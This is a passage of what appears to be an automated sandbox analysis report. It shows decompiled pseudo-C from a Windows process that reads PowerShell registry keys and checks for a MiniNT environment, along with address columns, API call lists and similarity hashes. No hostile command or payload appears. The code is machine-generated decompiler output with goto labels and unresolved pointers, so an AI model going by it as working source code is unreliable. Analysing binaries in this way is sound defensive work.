								goto L70;
							}
							__eflags = _t172;
							if(_t172 == 0) {
								goto L70;
							}
							_t125 = _v20;
							goto L40;
						}
					}
				}
			}
			_t128 = *_t175 & 0x0000ffff;
			_t158 = _t135;
			_v9 = 1;
			if(_t128 >= 0x30) {
				__eflags = _t128 - 0x39;
				if(_t128 > 0x39) {
					goto L13;
				}
				L64:
				_t121 = _v28;
				_t159 = 0;
				_t151 = _v20;
				goto L23;
			}
			L13:
			if(0 == *_t135 || _t135 >= _t175) {
				_t121 = _v28;
				_t159 = 0;
				goto L21;
			} else {
				while( *_t158 == 0x30) {
					_t158 = &(_t158[0]);
					__eflags = _t158 - _t175;
					if(_t158 < _t175) {
						continue;
					}
					break;
				}
				if((_t175 - _t158 & 0xfffffffe) > 0x14) {
					_t121 = _v28;
					_t159 = 0;
					_t151 = _v20;
					goto L23;
				}
				_v16 = 0;
				_t121 = wcstoul(_t158, &_v16, 0xa);
				_t181 = _t181 + 0xc;
				if(_t175 != _v16 || _t121 > 0x7fffffff) {
					goto L64;
				} else {
					_t159 = _v9;
					L21:
					if(_t159 == 0) {
						goto L42;
					}
					_t151 = 0;
					goto L23;
				}
			}
		}
		_push(L"SOFTWARE\\Microsoft\\PowerShell");
		_push(0x13);
		goto L79;
	}
}
                                                                                                                                                                                                                              0x0125901f
                                                                                                                                                                                                                              0x01259022
                                                                                                                                                                                                                              0x0125902a
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01259032
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01259038
                                                                                                                                                                                                                              0x01259042
                                                                                                                                                                                                                              0x01259044
                                                                                                                                                                                                                              0x01259049
                                                                                                                                                                                                                              0x0125905a
                                                                                                                                                                                                                              0x0125905f
                                                                                                                                                                                                                              0x01259064
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01259069
                                                                                                                                                                                                                              0x0125906b
                                                                                                                                                                                                                              0x0125907a
                                                                                                                                                                                                                              0x0125907d
                                                                                                                                                                                                                              0x01259080
                                                                                                                                                                                                                              0x01259084
                                                                                                                                                                                                                              0x0125908a
                                                                                                                                                                                                                              0x0125908e
                                                                                                                                                                                                                              0x0125b2e7
                                                                                                                                                                                                                              0x0125b2ea
                                                                                                                                                                                                                              0x0125b32b
                                                                                                                                                                                                                              0x0125b32e
                                                                                                                                                                                                                              0x0125b339
                                                                                                                                                                                                                              0x0125b339
                                                                                                                                                                                                                              0x0125b342
                                                                                                                                                                                                                              0x0125b347
                                                                                                                                                                                                                              0x0125b34f
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b34f
                                                                                                                                                                                                                              0x0125b2ec
                                                                                                                                                                                                                              0x0125b2f1
                                                                                                                                                                                                                              0x0125b2f5
                                                                                                                                                                                                                              0x0125b2fa
                                                                                                                                                                                                                              0x0125b31b
                                                                                                                                                                                                                              0x0125b321
                                                                                                                                                                                                                              0x0125b323
                                                                                                                                                                                                                              0x0125b2fc
                                                                                                                                                                                                                              0x0125b302
                                                                                                                                                                                                                              0x0125b308
                                                                                                                                                                                                                              0x0125b30a
                                                                                                                                                                                                                              0x0125b30a
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b2fa
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125908e
                                                                                                                                                                                                                              0x01258e74
                                                                                                                                                                                                                              0x01258e82
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258e94
                                                                                                                                                                                                                              0x01258e9d
                                                                                                                                                                                                                              0x01258e9f
                                                                                                                                                                                                                              0x01258ea4
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258eaa
                                                                                                                                                                                                                              0x01258eaf
                                                                                                                                                                                                                              0x0125b269
                                                                                                                                                                                                                              0x0125b26b
                                                                                                                                                                                                                              0x0125b26d
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b276
                                                                                                                                                                                                                              0x0125b279
                                                                                                                                                                                                                              0x01258f32
                                                                                                                                                                                                                              0x01258f34
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258f4b
                                                                                                                                                                                                                              0x01258f4e
                                                                                                                                                                                                                              0x01258f4f
                                                                                                                                                                                                                              0x01258f52
                                                                                                                                                                                                                              0x01258f54
                                                                                                                                                                                                                              0x01258f57
                                                                                                                                                                                                                              0x01258f5c
                                                                                                                                                                                                                              0x01258f5c
                                                                                                                                                                                                                              0x01258f68
                                                                                                                                                                                                                              0x01258f77
                                                                                                                                                                                                                              0x01258f79
                                                                                                                                                                                                                              0x01258f7c
                                                                                                                                                                                                                              0x01258f81
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258f87
                                                                                                                                                                                                                              0x01258f87
                                                                                                                                                                                                                              0x01258f8b
                                                                                                                                                                                                                              0x0125b2be
                                                                                                                                                                                                                              0x0125b2be
                                                                                                                                                                                                                              0x01258f9f
                                                                                                                                                                                                                              0x0125b2d5
                                                                                                                                                                                                                              0x0125b2d7
                                                                                                                                                                                                                              0x0125b2df
                                                                                                                                                                                                                              0x0125b2df
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258fa5
                                                                                                                                                                                                                              0x01258fa5
                                                                                                                                                                                                                              0x01258fac
                                                                                                                                                                                                                              0x01258fb0
                                                                                                                                                                                                                              0x0125b2c8
                                                                                                                                                                                                                              0x0125b2c8
                                                                                                                                                                                                                              0x0125b2cb
                                                                                                                                                                                                                              0x01258fed
                                                                                                                                                                                                                              0x01258fed
                                                                                                                                                                                                                              0x01258ff0
                                                                                                                                                                                                                              0x01258ff2
                                                                                                                                                                                                                              0x01258ff5
                                                                                                                                                                                                                              0x01258ff7
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258ff7
                                                                                                                                                                                                                              0x01258fbd
                                                                                                                                                                                                                              0x01258fbf
                                                                                                                                                                                                                              0x01258fc2
                                                                                                                                                                                                                              0x01258fc9

APIs
• RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\PowerShell,00000000,00020019,00000000,00000000,00000000), ref: 01258DF2
  • Part of subcall function 0125972E: malloc.MSVCRT ref: 01259748
• RegEnumKeyExW.KERNELBASE(00000000,00000000,00000000,00000100,00000000,00000000,00000000,?,00000000), ref: 01258E3A
• wcschr.MSVCRT ref: 01258E8B
• wcschr.MSVCRT ref: 01258E97
• wcstoul.MSVCRT ref: 01258F08
• free.MSVCRT(00000000), ref: 01258F57
• RegEnumKeyExW.KERNELBASE(00000000,00000001,00000000,00000100,00000000,00000000,00000000,?,00000000), ref: 01259019
• RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020019,00000000), ref: 01259084
• RegCloseKey.KERNELBASE(00000000,00000000), ref: 0125909C
• free.MSVCRT(00000000,00000000), ref: 012590A7
Strings
Memory Dump Source
• Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
• Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
Similarity
• API ID: EnumOpenfreewcschr$Closemallocwcstoul
• String ID: SOFTWARE\Microsoft\PowerShell$SOFTWARE\Microsoft\PowerShell\%1!ls!\PowerShellEngine
• API String ID: 2290616977-1295826426
• Opcode ID: bbc1d0bcfe742b4483e272ec2399e0d1d53053df52eedfc02c18d0a3d3591cb2
• Instruction ID: 1329a6ad33a68c2a8d55456feea73daee0535a64864158e8c60d78901ea042bf
• Opcode Fuzzy Hash: bbc1d0bcfe742b4483e272ec2399e0d1d53053df52eedfc02c18d0a3d3591cb2
• Instruction Fuzzy Hash: B1C1E775A20206ABDF609F69DCC9BBEBBB5AF48744F144019EE11F72D0D7B19800CBA1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 73%
E01258C90(void* __ebx, void* _a4, short* _a8, intOrPtr _a12, void** _a16) {
	signed int _v8;
	char _v9;
	short _v16;
	short _v20;
	int* _v24;
	int _v28;
	signed int _v32;
	int _v36;
	void* __edi;
	void* __esi;
	void* __ebp;
	signed int _t73;
	intOrPtr _t75;
	long _t80;
	void* _t81;
	signed int _t82;
	intOrPtr* _t86;
	void* _t89;
	void* _t90;
	intOrPtr* _t91;
	long _t99;
	void* _t100;
	signed int _t101;
	intOrPtr* _t105;
	void* _t108;
	void* _t109;
	short* _t111;
	unsigned int _t112;
	short* _t113;
	signed int _t114;
	void* _t140;
	void* _t142;
	void* _t147;
	void* _t150;
	signed int _t151;
	void* _t152;
	void* _t153;

	_t110 = __ebx;
	_t73 =  *0x1260358; // 0xc21f7063
	_v8 = _t73 ^ _t151;
	_t140 = _a4;
                                                                                                                                                                                                                              				_t150 = 0;
                                                                                                                                                                                                                              				_v36 = 0;
                                                                                                                                                                                                                              				_v28 = 0;
                                                                                                                                                                                                                              				_v9 = 1;
                                                                                                                                                                                                                              				if(_t140 == 0 || E01259200(_a12) != 0 || _a16 == 0) {
                                                                                                                                                                                                                              					_t75 = 0;
                                                                                                                                                                                                                              					L11:
                                                                                                                                                                                                                              					 *_a16 = _t150;
                                                                                                                                                                                                                              					return E01259A40(_t75, _t110, _v8 ^ _t151, _t136, _a16, _t150);
                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                              					_push(__ebx);
                                                                                                                                                                                                                              					_t111 = _a8;
                                                                                                                                                                                                                              					_t80 = RegQueryValueExW(_t140, _t111, 0,  &_v36, 0,  &_v28); // executed
                                                                                                                                                                                                                              					if(_t80 != 0) {
                                                                                                                                                                                                                              						_v16 = 0;
                                                                                                                                                                                                                              						_t81 = FormatMessageW(0x1100, 0, _t80, 0,  &_v16, 0, 0);
                                                                                                                                                                                                                              						_v24 = _t81;
                                                                                                                                                                                                                              						__eflags = _t81;
                                                                                                                                                                                                                              						if(_t81 == 0) {
                                                                                                                                                                                                                              							L13:
                                                                                                                                                                                                                              							_t75 = 0;
                                                                                                                                                                                                                              							L10:
                                                                                                                                                                                                                              							_pop(_t110);
                                                                                                                                                                                                                              							goto L11;
                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                              							_t82 = _t81 + 1;
                                                                                                                                                                                                                              							_v32 = _t82;
                                                                                                                                                                                                                              							_t136 = _t82 * 2 >> 0x20;
                                                                                                                                                                                                                              							_t142 = E0125972E( ~(0 | __eflags > 0x00000000) | _t82 * 0x00000002);
                                                                                                                                                                                                                              							_t153 = _t152 + 4;
                                                                                                                                                                                                                              							_v20 = _t142;
                                                                                                                                                                                                                              							__eflags = _t142;
                                                                                                                                                                                                                              							if(_t142 != 0) {
                                                                                                                                                                                                                              								_t136 = _v32;
                                                                                                                                                                                                                              								_t90 = E0125CE50(_t142, _v32, _v16);
                                                                                                                                                                                                                              								__eflags = _t90;
                                                                                                                                                                                                                              								if(_t90 < 0) {
                                                                                                                                                                                                                              									_v24 = 0;
                                                                                                                                                                                                                              									free(_t142);
                                                                                                                                                                                                                              									_t153 = _t153 + 4;
                                                                                                                                                                                                                              									_v20 = 0;
                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							LocalFree(_v16);
                                                                                                                                                                                                                              							__eflags = _v24 - _t150;
                                                                                                                                                                                                                              							if(_v24 > _t150) {
                                                                                                                                                                                                                              								_t86 =  *0x12606d4; // 0x0
                                                                                                                                                                                                                              								 *0x1261204(_t86, 0, 0x16, _a12, _t111, _v20);
                                                                                                                                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_t86 + 4))))();
                                                                                                                                                                                                                              								_t89 = _v20;
                                                                                                                                                                                                                              								__eflags = _t89;
                                                                                                                                                                                                                              								if(_t89 != 0) {
                                                                                                                                                                                                                              									free(_t89);
                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              					if(_v36 != 1) {
                                                                                                                                                                                                                              						_push(_t111);
                                                                                                                                                                                                                              						_push(_a12);
                                                                                                                                                                                                                              						_push(0x18);
                                                                                                                                                                                                                              						L32:
                                                                                                                                                                                                                              						_t91 =  *0x12606d4; // 0x0
                                                                                                                                                                                                                              						 *0x1261204(_t91, 0);
                                                                                                                                                                                                                              						 *((intOrPtr*)( *((intOrPtr*)( *_t91 + 4))))();
                                                                                                                                                                                                                              						goto L13;
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              					_t112 = _v28;
                                                                                                                                                                                                                              					_t163 = _t112;
                                                                                                                                                                                                                              					if(_t112 == 0) {
                                                                                                                                                                                                                              						_t113 = _a8;
                                                                                                                                                                                                                              						L31:
                                                                                                                                                                                                                              						_push(_t113);
                                                                                                                                                                                                                              						_push(_a12);
                                                                                                                                                                                                                              						_push(0xe);
                                                                                                                                                                                                                              						goto L32;
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              					_t114 = _t112 >> 1;
                                                                                                                                                                                                                              					_t13 = _t114 + 1; // 0x1
                                                                                                                                                                                                                              					_t136 = _t13 * 2 >> 0x20;
                                                                                                                                                                                                                              					_t150 = E0125972E( ~(0 | _t163 > 0x00000000) | _t13 * 0x00000002);
                                                                                                                                                                                                                              					_t152 = _t152 + 4;
                                                                                                                                                                                                                              					if(_t150 == 0) {
                                                                                                                                                                                                                              						goto L13;
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              					 *((short*)(_t150 + _t114 * 2)) = 0;
                                                                                                                                                                                                                              					_t113 = _a8;
                                                                                                                                                                                                                              					_t99 = RegQueryValueExW(_t140, _t113, 0, 0, _t150,  &_v28); // executed
                                                                                                                                                                                                                              					if(_t99 != 0) {
                                                                                                                                                                                                                              						_v20 = 0;
                                                                                                                                                                                                                              						_t100 = FormatMessageW(0x1100, 0, _t99, 0,  &_v20, 0, 0);
                                                                                                                                                                                                                              						_v24 = _t100;
                                                                                                                                                                                                                              						__eflags = _t100;
                                                                                                                                                                                                                              						if(_t100 != 0) {
                                                                                                                                                                                                                              							_t101 = _t100 + 1;
                                                                                                                                                                                                                              							_v32 = _t101;
                                                                                                                                                                                                                              							_t136 = _t101 * 2 >> 0x20;
                                                                                                                                                                                                                              							_t147 = E0125972E( ~(0 | __eflags > 0x00000000) | _t101 * 0x00000002);
                                                                                                                                                                                                                              							_t152 = _t152 + 4;
                                                                                                                                                                                                                              							_v16 = _t147;
                                                                                                                                                                                                                              							__eflags = _t147;
                                                                                                                                                                                                                              							if(_t147 != 0) {
                                                                                                                                                                                                                              								_t136 = _v32;
                                                                                                                                                                                                                              								_t109 = E0125CE50(_t147, _v32, _v20);
                                                                                                                                                                                                                              								__eflags = _t109;
                                                                                                                                                                                                                              								if(_t109 < 0) {
                                                                                                                                                                                                                              									_v24 = 0;
                                                                                                                                                                                                                              									free(_t147);
                                                                                                                                                                                                                              									_t152 = _t152 + 4;
                                                                                                                                                                                                                              									_v16 = 0;
                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                              							}
				LocalFree(_v20);
				__eflags = _v24;
				if(_v24 > 0) {
					_t105 =  *0x12606d4; // 0x0
					 *0x1261204(_t105, 0, 0x16, _a12, _t113, _v16);
					 *((intOrPtr*)( *((intOrPtr*)( *_t105 + 4))))();
					_t108 = _v16;
					_t152 = _t152 + 0x18;
					__eflags = _t108;
					if(_t108 != 0) {
						free(_t108);
						_t152 = _t152 + 4;
					}
				}
			}
			free(_t150);
			_t150 = 0;
			_t75 = 0;
			goto L10;
		}
		if(_t99 ==  *_t150) {
			goto L31;
		} else {
			_t75 = _v9;
			goto L10;
		}
	}
}
                                                                                                                                                                                                                              0x0125b1b3
                                                                                                                                                                                                                              0x0125b1b6
                                                                                                                                                                                                                              0x0125b1bb
                                                                                                                                                                                                                              0x0125b1bb
                                                                                                                                                                                                                              0x0125b1b3
                                                                                                                                                                                                                              0x0125b189
                                                                                                                                                                                                                              0x0125b1bf
                                                                                                                                                                                                                              0x0125b1c7
                                                                                                                                                                                                                              0x0125b1c9
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b1c9
                                                                                                                                                                                                                              0x01258d54
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258d5a
                                                                                                                                                                                                                              0x01258d5a
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258d5a
                                                                                                                                                                                                                              0x01258d54

APIs
• RegQueryValueExW.KERNELBASE(00000001,00002014,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 01258CEC
• RegQueryValueExW.KERNELBASE(00000001,00002014,00000000,00000000,00000000,00000000), ref: 01258D43
• FormatMessageW.KERNEL32(00001100,00000000,00000000,00000000,00002014,00000000,00000000), ref: 0125B054
• free.MSVCRT(00000000,00002014), ref: 0125B0A0
• LocalFree.KERNEL32(00002014), ref: 0125B0AE
• free.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00002014,00000001,?), ref: 0125B0EC
  • Part of subcall function 0125972E: malloc.MSVCRT ref: 01259748
• FormatMessageW.KERNEL32(00001100,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0125B11D
• free.MSVCRT(00000000,00000000), ref: 0125B16D
• LocalFree.KERNEL32(00000000), ref: 0125B17F
• free.MSVCRT(00002014), ref: 0125B1B6
• free.MSVCRT(00000000), ref: 0125B1BF
Memory Dump Source
• Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
• Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
Similarity
• API ID: free$FormatFreeLocalMessageQueryValue$malloc
• String ID:
• API String ID: 1073575276-0
• Opcode ID: 06d42f576aa5462f6f5e552ad7c40bfad4c7aef636792ecaa33e2267cfd1cfb3
• Instruction ID: 9359468f630a9d3376a88e9613d2dff71f44d007c422645793c6d2ec7678badf
• Opcode Fuzzy Hash: 06d42f576aa5462f6f5e552ad7c40bfad4c7aef636792ecaa33e2267cfd1cfb3
• Instruction Fuzzy Hash: C571F2B1A1020AAFEF609F65DC85BBFB7B9EF44740F044025EE11E7290D7B1A911CBA1
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
• Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID: wks
• API String ID: 0-3791271213
• Opcode ID: c1b5473bcb9d3ef9cd371891e31d049fb69d872f847c5ba88327f390703e18d6
• Instruction ID: 5603729102c52a79dd9a26218ea25843a0dd66bbd953a96f8a7ddc9892526c10
• Opcode Fuzzy Hash: c1b5473bcb9d3ef9cd371891e31d049fb69d872f847c5ba88327f390703e18d6
• Instruction Fuzzy Hash: 7C228BA64AE3C15FE7574B345CAA5A17F749F13224B5E04DBCAC0CB1A3E2285D0AC772
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E01259E90() {

    SetUnhandledExceptionFilter(E01259E40); // executed
    return 0;
}




APIs
• SetUnhandledExceptionFilter.KERNELBASE(Function_00009E40), ref: 01259E95
Memory Dump Source
• Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
• Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: a888a8908b8deaeeb454f94dd6b94d16abcf040eabf4fa97cf25a799d30831e5
• Instruction ID: b6382392c0bc3b083c13a2c4f5988a78ea3869c754b4cad9fca926352d2ff747
• Opcode Fuzzy Hash: a888a8908b8deaeeb454f94dd6b94d16abcf040eabf4fa97cf25a799d30831e5
• Instruction Fuzzy Hash: 259002A0361140866F511B71784E80525915F8D5177414466E809C4058DB605094B611
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000E.00000002.391222410.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 26d43029df56325516f6a59a9b48cbc54261fa003119fe5c2aaab4b2991f3466
• Instruction ID: 3ea37eecda4f6297087f7a5269c11f545ce12ae6efb35af47b58e571fc43f1b5
• Opcode Fuzzy Hash: 26d43029df56325516f6a59a9b48cbc54261fa003119fe5c2aaab4b2991f3466
• Instruction Fuzzy Hash: A7A16F34600605DFE729DF35D8987AEBBF2BF88304F1485A9D5429B3A1CB79D885CB90
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 59%
E01258450(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8) {
    signed int _v8;
    char _v32;
    short* _v36;
    char _v37;
    void* _v44;
    int _v48;
    int _v52;
    void* _v56;
    int _v60;
    int _v64;
    void* _v68;
    int _v72;
    int _v76;
    void* _v80;
    void* _v84;
    void* _v88;
    int* _v92;
                                                                                                                                                                                                                              				void* _v96;
                                                                                                                                                                                                                              				char _v100;
                                                                                                                                                                                                                              				char _v104;
                                                                                                                                                                                                                              				struct _STARTUPINFOW _v172;
                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                              				void* __ebp;
                                                                                                                                                                                                                              				signed int _t138;
                                                                                                                                                                                                                              				int _t150;
                                                                                                                                                                                                                              				struct HINSTANCE__* _t151;
                                                                                                                                                                                                                              				long _t156;
                                                                                                                                                                                                                              				intOrPtr* _t158;
                                                                                                                                                                                                                              				int _t165;
                                                                                                                                                                                                                              				void* _t166;
                                                                                                                                                                                                                              				signed int _t167;
                                                                                                                                                                                                                              				signed int _t168;
                                                                                                                                                                                                                              				intOrPtr* _t169;
                                                                                                                                                                                                                              				void* _t179;
                                                                                                                                                                                                                              				void* _t180;
                                                                                                                                                                                                                              				void* _t181;
                                                                                                                                                                                                                              				long _t184;
                                                                                                                                                                                                                              				signed int _t186;
                                                                                                                                                                                                                              				void* _t188;
                                                                                                                                                                                                                              				long _t191;
                                                                                                                                                                                                                              				int _t192;
                                                                                                                                                                                                                              				intOrPtr* _t193;
                                                                                                                                                                                                                              				void* _t202;
                                                                                                                                                                                                                              				void** _t204;
                                                                                                                                                                                                                              				void** _t208;
                                                                                                                                                                                                                              				void* _t216;
                                                                                                                                                                                                                              				void* _t217;
                                                                                                                                                                                                                              				void* _t218;
                                                                                                                                                                                                                              				long _t220;
                                                                                                                                                                                                                              				void** _t221;
                                                                                                                                                                                                                              				void* _t227;
                                                                                                                                                                                                                              				signed int _t228;
                                                                                                                                                                                                                              				void* _t229;
                                                                                                                                                                                                                              				short* _t234;
                                                                                                                                                                                                                              				void** _t236;
                                                                                                                                                                                                                              				void* _t246;
                                                                                                                                                                                                                              				int _t247;
                                                                                                                                                                                                                              				void** _t249;
                                                                                                                                                                                                                              				void* _t253;
                                                                                                                                                                                                                              				signed int _t256;
                                                                                                                                                                                                                              				void* _t257;
                                                                                                                                                                                                                              				void** _t259;
                                                                                                                                                                                                                              				void** _t261;
                                                                                                                                                                                                                              				void** _t264;
                                                                                                                                                                                                                              				void** _t266;
                                                                                                                                                                                                                              				signed int _t267;
                                                                                                                                                                                                                              				void* _t268;
                                                                                                                                                                                                                              
                                                                                                                                                                                                                              				_t138 =  *0x1260358; // 0xc21f7063
                                                                                                                                                                                                                              				_v8 = _t138 ^ _t267;
                                                                                                                                                                                                                              				_t227 = _a8;
                                                                                                                                                                                                                              				_v96 = _t227;
                                                                                                                                                                                                                              				_v44 = 0;
                                                                                                                                                                                                                              				_v92 = 0;
                                                                                                                                                                                                                              				_v48 = 0;
                                                                                                                                                                                                                              				_v60 = 0;
                                                                                                                                                                                                                              				_v80 = 0;
                                                                                                                                                                                                                              				__imp__SetThreadUILanguage(0); // executed
                                                                                                                                                                                                                              				if(E012595A0(__edx, __ecx) != 0) {
                                                                                                                                                                                                                              					GetStartupInfoW( &_v172);
                                                                                                                                                                                                                              					if((_v172.dwFlags & 0x00000001) != 0) {
                                                                                                                                                                                                                              						__eflags = _v172.wShowWindow;
                                                                                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                                                                                              							E0125C231(_t227,  &_v172, _t246, _t253, __eflags);
                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                              				_v36 = 0xffffffff;
                                                                                                                                                                                                                              				_v72 = 0xffffffff;
                                                                                                                                                                                                                              				_v76 = 0xffffffff;
                                                                                                                                                                                                                              				_v64 = 0xffffffff;
                                                                                                                                                                                                                              				_v52 = 0xffffffff;
                                                                                                                                                                                                                              				_v56 = 0xffffffff;
                                                                                                                                                                                                                              				_t244 = _t227;
                                                                                                                                                                                                                              				_t150 = E01259310(_a4, _t227,  &_v44,  &_v36,  &_v72,  &_v76,  &_v60,  &_v64,  &_v92,  &_v52,  &_v56); // executed
                                                                                                                                                                                                                              				_t247 = _t150;
                                                                                                                                                                                                                              				if(_t247 != 0) {
                                                                                                                                                                                                                              					L48:
                                                                                                                                                                                                                              					_t151 =  *0x12606e4; // 0x0
                                                                                                                                                                                                                              					if(_t151 != 0) {
                                                                                                                                                                                                                              						FreeLibrary(_t151);
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              					return E01259A40(_t247, _t227, _v8 ^ _t267, _t244, _t247, _t253);
                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                              					_push(_t253);
                                                                                                                                                                                                                              					_t156 = RegOpenKeyExW(0x80000002, L"SYSTEM\\CurrentControlSet\\Control\\MiniNT", _t247, 0x20019,  &_v56); // executed
                                                                                                                                                                                                                              					if(_t156 == 0) {
                                                                                                                                                                                                                              						RegCloseKey(_v56);
                                                                                                                                                                                                                              						_t234 = _v36;
                                                                                                                                                                                                                              						__eflags = _t234 - 1;
                                                                                                                                                                                                                              						if(_t234 == 1) {
                                                                                                                                                                                                                              							L56:
                                                                                                                                                                                                                              							_t158 =  *0x12606dc; // 0x3403de0
                                                                                                                                                                                                                              							_t247 = 0x23;
                                                                                                                                                                                                                              							 *((long long*)(_t268 - 8)) =  *0x1257720;
                                                                                                                                                                                                                              							 *0x1261204(_t158, 0, 0x23, _t234);
                                                                                                                                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)( *_t158 + 4))))();
                                                                                                                                                                                                                              							L47:
                                                                                                                                                                                                                              							_pop(_t253);
                                                                                                                                                                                                                              							goto L48;
                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                              						__eflags = _t234 - 2;
                                                                                                                                                                                                                              						if(_t234 != 2) {
                                                                                                                                                                                                                              							L5:
                                                                                                                                                                                                                              							if(_t234 != 5) {
                                                                                                                                                                                                                              								__eflags = _t234 - 4;
                                                                                                                                                                                                                              								if(_t234 == 4) {
                                                                                                                                                                                                                              									goto L6;
								}
								L7:
								_t256 = _v76;
								if(_t256 != 0xffffffff) {
									_v37 = 0;
								} else {
									_v37 = 1;
								}
								_t165 = E01258850( &_v44,  &_v36, _v72,  &_v48, _t234,  &_v80); // executed
								_t227 = _v80;
								_t247 = _t165;
								if(_t247 != 0) {
									_t166 = _v48;
									_t257 = _v44;
									goto L42;
								} else {
									_t228 = _t227 | 0xffffffff;
									if(_t256 > _t228) {
										_t228 = _t256;
									}
									_t167 = _v52;
									if(_t167 > _t228) {
										_t228 = _t167;
									}
									_t168 = _v64;
									if(_t168 > _t228) {
										_t228 = _t168;
									}
									_t229 = 1 + _t228;
									if(_v36 == 2) {
										_v52 = 1;
									} else {
										_v52 = 3;
									}
									_t236 = _v60;
									_v72 = _t236;
									if(_t236 != 0) {
										_t169 =  *0x12606dc; // 0x3403de0
										_t259 =  *( *_t169 + 4);
										_t236 = _t259;
										 *0x1261204(_t169, 0, 0x24, _t236);
										 *_t259();
										_t268 = _t268 + 0x10;
										_v76 = _v48;
									} else {
										_v72 = _v48;
										_v76 = _t236;
									}
									_t257 = _v44;
									_t244 = 0;
									_v88 = _t257;
									_v68 = 0;
									_v64 = 0;
									_v84 = 0;
									_v48 = 0;
									_v60 = 0;
									if(_t257 == 0) {
										__eflags = E01258D90( &_v68,  &_v84,  &_v88,  &_v104);
										_v64 = _v84;
										if(__eflags == 0) {
											goto L75;
										}
										goto L32;
									} else {
										_v36 = 0;
										if(E01259200(_t257) != 0) {
											L75:
											_t247 = 0xfffb0000;
											L32:
											if(_t247 == 0) {
